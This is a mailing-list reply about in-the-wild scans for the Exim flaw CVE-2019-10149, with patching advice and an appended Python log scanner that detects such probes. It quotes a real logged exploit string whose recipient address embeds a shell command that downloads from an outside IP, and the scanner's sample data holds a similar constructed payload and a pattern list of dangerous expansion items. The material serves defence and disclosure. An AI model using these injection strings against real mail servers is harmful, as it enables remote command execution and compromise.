Re: [bitfolk] Scans attempting to exploit CVE-2019-10149 hav…

Author: Ian
Date:  
To: users
Subject: Re: [bitfolk] Scans attempting to exploit CVE-2019-10149 have been in the wild for some days
Adam Spiers said:

> Phew... I think?! The depressing thing is that there's no way to know for sure whether I patched in time, even with things like rkhunter already in place... I patched 15 days ago (7th June), and I see 15 remote exploit attempts in the rejectlogs from the last 7 days alone - unfortunately my logrotate already ditched logs from the previous week.


For a number of reasons, I keep mail logs rather longer than that, so
I can see that on my only VPS that is open to accepting email, attacks
started on the 18th:

Jun 18 23:25:22 example postgrey[730]: action=greylist, reason=new,
client_name=host34-234-19-46.soho.nordext.net,
client_address=46.19.234.34, sender=support@???,
recipient=root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f1.2.3.4x22}}@???

... and while there have been attempts since then, there's nothing
similar before that.

As you can see, that VPS runs postfix anyway. It's possible some
attackers look for the name of the mail server program before trying
to run the actual exploit, and so wouldn't show in postfix logs, but I
think it's unlikely that this is something the first ones would do.

All my other VPSes have exim4 (and were updated on the 5th) but only
to send email: with the exception of the ssh, http/https, and a couple
of other ports, all incoming ports on those are closed by the
firewall.

Fortunately.

> Thanks again to Andy, without whose warning I would definitely not have known to patch my exim quickly enough!


It's well worth having something do regular (hourly?) 'apt-get
update's and email you if there is anything to upgrade. I'm not quite
ready to do automatic upgrades, because occasionally Debian do get
something wrong, but having instant-ish notice that there are upgrades
is very useful.

Ian
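As an added illustration (not part of Ian's message or of any BitFolk tooling), the following Python scans postgrey/postfix log lines for recipient addresses whose local part carries an Exim expansion item like the one in the log line quoted above, and decodes the `\xHH` escapes so the attempted command can be read in the rejectlog. The sample lines, hostnames and IP addresses are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines (not from the original message); hostnames and IPs
# are placeholders. The second line mirrors the shape of the probe quoted in
# the thread: an Exim ${run{...}} expansion in the recipient's local part.
SAMPLE_LOG = r"""
Jun 18 23:20:01 mx postgrey[730]: action=pass, reason=triplet found, client_name=mail.example.org, client_address=192.0.2.10, sender=alice@example.org, recipient=bob@example.net
Jun 18 23:25:22 mx postgrey[730]: action=greylist, reason=new, client_name=host.example.invalid, client_address=198.51.100.7, sender=support@example.invalid, recipient=root+${run{\x2Fbin\x2Fsh\t-c\x22wget\x20203.0.113.5\x2ftmp\x2fVICTIM\x22}}@example.net
""".strip().splitlines()

# Exim expansion items that execute or evaluate something; none of them has
# any legitimate reason to appear inside an address local part.
EXPANSION_RE = re.compile(r"\$\{(run|perl|readsocket|dlfunc|lookup|expand)\s*\{", re.I)
FIELD_RE = re.compile(r"\b(client_address|sender|recipient)=(\S+?),?(?=\s|$)")
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tnr\\])")
SIMPLE_ESCAPES = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}

def decode_exim_escapes(s: str) -> str:
    r"""Resolve \xHH, \t, \n, \r and \\ the way Exim's string expander does,
    so the logged local part reads as the command it would have become."""
    return ESCAPE_RE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else SIMPLE_ESCAPES[m.group(2)], s)

@dataclass
class Finding:
    client_address: str
    sender: str
    recipient: str
    decoded_local_part: str

def inspect_line(line: str) -> Optional[Finding]:
    """Return a Finding when the recipient local part carries an Exim expansion item."""
    fields = dict(FIELD_RE.findall(line))
    recipient = fields.get("recipient", "")
    # The payload may itself contain '@'; the real domain follows the last one.
    local_part = recipient.rpartition("@")[0]
    if not EXPANSION_RE.search(local_part):
        return None
    return Finding(fields.get("client_address", "?"), fields.get("sender", "?"),
                   recipient, decode_exim_escapes(local_part))

def scan_log(lines: List[str]) -> List[Finding]:
    return [f for f in map(inspect_line, lines) if f is not None]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client_address} -> {f.recipient}\n   decoded: {f.decoded_local_part!r}")
```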